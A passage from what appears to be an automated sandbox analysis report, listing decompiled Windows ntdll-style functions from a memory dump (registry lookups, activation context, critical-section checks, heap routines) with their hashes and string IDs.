				E01721293(_t79, _v40, E017207DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01677D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0171138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                      0x017205c5
                                                      0x017205ca
                                                      0x017205d3
                                                      0x017206db
                                                      0x017206db
                                                      0x017206dd
                                                      0x017206e3
                                                      0x017206e3
                                                      0x017205dd
                                                      0x017205e7
                                                      0x017205f6
                                                      0x01720600
                                                      0x01720607
                                                      0x01720610
                                                      0x01720615
                                                      0x0172061a
                                                      0x0172061c
                                                      0x0172061e
                                                      0x01720624
                                                      0x01720625
                                                      0x01720627
                                                      0x01720628
                                                      0x01720631
                                                      0x01720640
                                                      0x0172064d
                                                      0x01720654
                                                      0x01720654
                                                      0x01720631
                                                      0x0172066d
                                                      0x01720674
                                                      0x00000000
                                                      0x00000000
                                                      0x01720692
                                                      0x0172069e
                                                      0x017206b0
                                                      0x017206a0
                                                      0x017206a9
                                                      0x017206a9
                                                      0x017206b8
                                                      0x017206d6
                                                      0x017206d6
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction ID: 2e4658482be1539b63174d03dbe2b2b457485cd9ec9c846c63455925cbe2e3dd
                                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction Fuzzy Hash: 2C3124323003566BE720DE28CD45F9BBBE9EBC4754F144228FA449B280D770E915C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016D3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E016D3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01699650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01674620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01699650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                      0x016d3893
                                                      0x016d3896
                                                      0x016d3899
                                                      0x016d389f
                                                      0x016d38a0
                                                      0x016d38a4
                                                      0x016d38a9
                                                      0x016d38ac
                                                      0x016d38ad
                                                      0x016d38ae
                                                      0x016d38af
                                                      0x016d38b1
                                                      0x016d38b4
                                                      0x016d38bb
                                                      0x016d38bc
                                                      0x016d38bd
                                                      0x016d38c4
                                                      0x016d38c8
                                                      0x016d38ca
                                                      0x016d38ca
                                                      0x016d38d5
                                                      0x016d393e
                                                      0x016d3940
                                                      0x016d3942
                                                      0x016d3952
                                                      0x016d3954
                                                      0x016d3961
                                                      0x016d3961
                                                      0x016d3967
                                                      0x016d396e
                                                      0x016d396e
                                                      0x016d3947
                                                      0x016d394c
                                                      0x00000000
                                                      0x016d394c
                                                      0x016d38ea
                                                      0x016d38ee
                                                      0x016d38f8
                                                      0x016d38f9
                                                      0x016d38ff
                                                      0x016d3900
                                                      0x016d3902
                                                      0x016d3903
                                                      0x016d390b
                                                      0x016d390f
                                                      0x016d3950
                                                      0x00000000
                                                      0x016d3950
                                                      0x016d3915
                                                      0x016d391d
                                                      0x016d391d
                                                      0x016d3922
                                                      0x016d3926
                                                      0x00000000
                                                      0x016d3928
                                                      0x016d392b
                                                      0x016d392b
                                                      0x016d3935
                                                      0x016d3937
                                                      0x016d3937
                                                      0x00000000
                                                      0x016d3935
                                                      0x016d3926
                                                      0x016d38f0
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      • Opcode ID: d5aa29fb5a14f8287289226fa4da348802ae7effaafd31d8304e0f6dc6b966c6
                                                      • Instruction ID: 1d623bedb04e80f46c4733f95c5f3280c4ae1740cfbe635d9a8e34c7c4d8b7b8
                                                      • Opcode Fuzzy Hash: d5aa29fb5a14f8287289226fa4da348802ae7effaafd31d8304e0f6dc6b966c6
                                                      • Instruction Fuzzy Hash: 6331C0B2D0151AAFEB15DA58CD45E7BBB79FB80B20F014169E914AB391E7309E00C7E2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0168D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 33%
                                                      			E0168D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x174d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01674120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0169B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E016998D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E016995D0();
					L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                      0x0168d29c
                                                      0x0168d2a6
                                                      0x0168d2b1
                                                      0x0168d2b5
                                                      0x0168d2b6
                                                      0x0168d2bc
                                                      0x0168d2bd
                                                      0x0168d2be
                                                      0x0168d2bf
                                                      0x0168d2c2
                                                      0x0168d2c4
                                                      0x0168d2cc
                                                      0x0168d384
                                                      0x0168d34b
                                                      0x0168d34f
                                                      0x0168d350
                                                      0x0168d351
                                                      0x0168d35c
                                                      0x0168d35c
                                                      0x0168d2d6
                                                      0x0168d2da
                                                      0x0168d2e1
                                                      0x0168d361
                                                      0x0168d369
                                                      0x0168d36d
                                                      0x0168d2e3
                                                      0x0168d2e3
                                                      0x0168d2e3
                                                      0x0168d2e5
                                                      0x0168d2ed
                                                      0x0168d2f5
                                                      0x0168d2fa
                                                      0x0168d302
                                                      0x0168d303
                                                      0x0168d30b
                                                      0x0168d30f
                                                      0x0168d313
                                                      0x0168d318
                                                      0x0168d31c
                                                      0x0168d320
                                                      0x0168d379
                                                      0x0168d37d
                                                      0x00000000
                                                      0x00000000
                                                      0x016caffe
                                                      0x016cb001
                                                      0x016cb011
                                                      0x00000000
                                                      0x0168d322
                                                      0x0168d322
                                                      0x0168d330
                                                      0x0168d337
                                                      0x0168d35d
                                                      0x0168d339
                                                      0x0168d33f
                                                      0x0168d38c
                                                      0x0168d38c
                                                      0x0168d33f
                                                      0x0168d349
                                                      0x00000000
                                                      0x0168d349

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 29cfe6feb9508596637875881a216a9dd6c88fe585c92efb6613675042abb806
                                                      • Instruction ID: a20d82211ef7932c793fb43f2833517798701ddc31f2ae2b8a7b6ce54a3ed95b
                                                      • Opcode Fuzzy Hash: 29cfe6feb9508596637875881a216a9dd6c88fe585c92efb6613675042abb806
                                                      • Instruction Fuzzy Hash: DD3193B1548305DFC721EF68CD8096BBBE9EB96654F000A2EF99493390D735DD05CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01661B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E01661B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0169BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0169A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0169A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01674620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                      0x01661b8f
                                                      0x01661b9a
                                                      0x01661b9c
                                                      0x01661b9e
                                                      0x01661ba3
                                                      0x016b7010
                                                      0x016b7010
                                                      0x00000000
                                                      0x01661ba9
                                                      0x01661ba9
                                                      0x01661bae
                                                      0x00000000
                                                      0x01661bc5
                                                      0x01661bca
                                                      0x01661bcf
                                                      0x01661bd0
                                                      0x01661bd1
                                                      0x01661bd2
                                                      0x01661bd6
                                                      0x01661bdc
                                                      0x01661be0
                                                      0x016b6ffc
                                                      0x016b7000
                                                      0x00000000
                                                      0x016b7006
                                                      0x016b7009
                                                      0x016b7009
                                                      0x01661be6
                                                      0x01661bec
                                                      0x01661c0b
                                                      0x01661c0b
                                                      0x01661c0c
                                                      0x01661c11
                                                      0x01661c12
                                                      0x01661c15
                                                      0x01661c1b
                                                      0x01661c1f
                                                      0x01661c31
                                                      0x01661c33
                                                      0x016b7026
                                                      0x016b7026
                                                      0x01661c21
                                                      0x01661c24
                                                      0x01661c24
                                                      0x01661bee
                                                      0x01661bee
                                                      0x01661bf2
                                                      0x01661c3a
                                                      0x01661bf4
                                                      0x01661bf4
                                                      0x01661c05
                                                      0x01661c05
                                                      0x01661c09
                                                      0x01661c3e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01661c09
                                                      0x01661bec
                                                      0x01661be0
                                                      0x01661bae
                                                      0x01661c2e

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: WindowsExcludedProcs
                                                      • API String ID: 0-3583428290
                                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction ID: c54a62dad8d5e22e44b5b56b619f587eba2a351cc4a53fe527b7ee12250c871e
                                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction Fuzzy Hash: D821DA7A501529ABDB229A5DCC80FAFBBADEFC2651F054466FE049B304D734DD01D7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0167F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0167F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                      0x0167f71d
                                                      0x0167f722
                                                      0x0167f726
                                                      0x016c4770
                                                      0x0167f765
                                                      0x0167f769
                                                      0x0167f769
                                                      0x0167f732
                                                      0x016c477a
                                                      0x00000000
                                                      0x016c477a
                                                      0x0167f738
                                                      0x0167f73a
                                                      0x0167f73c
                                                      0x0167f73f
                                                      0x0167f746
                                                      0x0167f778
                                                      0x0167f7a9
                                                      0x0167f7a9
                                                      0x0167f754
                                                      0x0167f75a
                                                      0x0167f75d
                                                      0x0167f75f
                                                      0x0167f761
                                                      0x0167f76f
                                                      0x0167f771
                                                      0x0167f771
                                                      0x0167f76f
                                                      0x0167f763
                                                      0x00000000
                                                      0x0167f763
                                                      0x0167f77d
                                                      0x0167f7a3
                                                      0x0167f7a5
                                                      0x00000000
                                                      0x0167f7a5
                                                      0x0167f77f
                                                      0x0167f782
                                                      0x0167f784
                                                      0x0167f786
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0167f788
                                                      0x0167f748
                                                      0x0167f74d
                                                      0x0167f78d
                                                      0x0167f793
                                                      0x0167f7b7
                                                      0x0167f7bc
                                                      0x00000000
                                                      0x0167f7bc
                                                      0x0167f798
                                                      0x00000000
                                                      0x00000000
                                                      0x0167f79d
                                                      0x0167f7b0
                                                      0x00000000
                                                      0x0167f7b0
                                                      0x0167f79f
                                                      0x00000000
                                                      0x0167f74f
                                                      0x0167f74f
                                                      0x00000000
                                                      0x0167f74f

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx
                                                      • API String ID: 0-89312691
                                                      • Opcode ID: ff21d3628a1ddc07739cc66e0ca9096aca19bf087a0c22715c92accf98097bd4
                                                      • Instruction ID: 044a1423ffc928ccf20516a70da228a2e3cfd3683f148ffd73ac73d8ac05f583
                                                      • Opcode Fuzzy Hash: ff21d3628a1ddc07739cc66e0ca9096aca19bf087a0c22715c92accf98097bd4
                                                      • Instruction Fuzzy Hash: 9711C1353087028BFB254E1DAC91F36F6D6EB96624F2445BEE972CB391EB70C8428740
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01708DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E01708DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1730d50);
				E016AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E016E5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L016ADEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L016ADEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E016AD130(_t34, _t39, _t40);
			}





                                                      0x01708df1
                                                      0x01708df1
                                                      0x01708df1
                                                      0x01708df1
                                                      0x01708df1
                                                      0x01708df1
                                                      0x01708df3
                                                      0x01708df8
                                                      0x01708dfd
                                                      0x01708e00
                                                      0x01708e0e
                                                      0x01708e2a
                                                      0x01708e36
                                                      0x01708e38
                                                      0x01708e3c
                                                      0x01708e46
                                                      0x01708e46
                                                      0x01708e36
                                                      0x01708e50
                                                      0x01708e56
                                                      0x01708e59
                                                      0x01708e5c
                                                      0x01708e60
                                                      0x01708e67
                                                      0x01708e6d
                                                      0x01708e73
                                                      0x01708e74
                                                      0x01708eb1
                                                      0x01708ebd

                                                      Strings
                                                      • Critical error detected %lx, xrefs: 01708E21
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Critical error detected %lx
                                                      • API String ID: 0-802127002
                                                      • Opcode ID: 29431f752bec24076e424f8d2e6c44538e9dd626055e92bde0d7163fb85bc644
                                                      • Instruction ID: b6b23c571c9de2b5e2602e416120dc95c6fa4a7962e69114ed84683e7cd3d885
                                                      • Opcode Fuzzy Hash: 29431f752bec24076e424f8d2e6c44538e9dd626055e92bde0d7163fb85bc644
                                                      • Instruction Fuzzy Hash: 3E1135B5D55348DADF26CFA8990579DFBF1BB18314F24425EE529AB282C3740A02CF19
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016EFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 016EFF60
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                      • API String ID: 0-1911121157
                                                      • Opcode ID: 9d63c7aa5612246d140f15ab78c56618c8d423acbfb358410527d83ecac9d042
                                                      • Instruction ID: 281aeb295c320e45bbec773010857370d803c0a9a02f81954b58178d37eaf5f2
                                                      • Opcode Fuzzy Hash: 9d63c7aa5612246d140f15ab78c56618c8d423acbfb358410527d83ecac9d042
                                                      • Instruction Fuzzy Hash: 8111ED75951144EFDB22EF98CD48F98BBF2BB08714F548598E1086B6A1C7399940CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01725BA5, Relevance: .6, Instructions: 592COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 88%
                                                      			E01725BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1731178);
				E016AD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01724C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0169D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01725542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x17460e8;
								if( *0x17460e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x17460e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01699710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
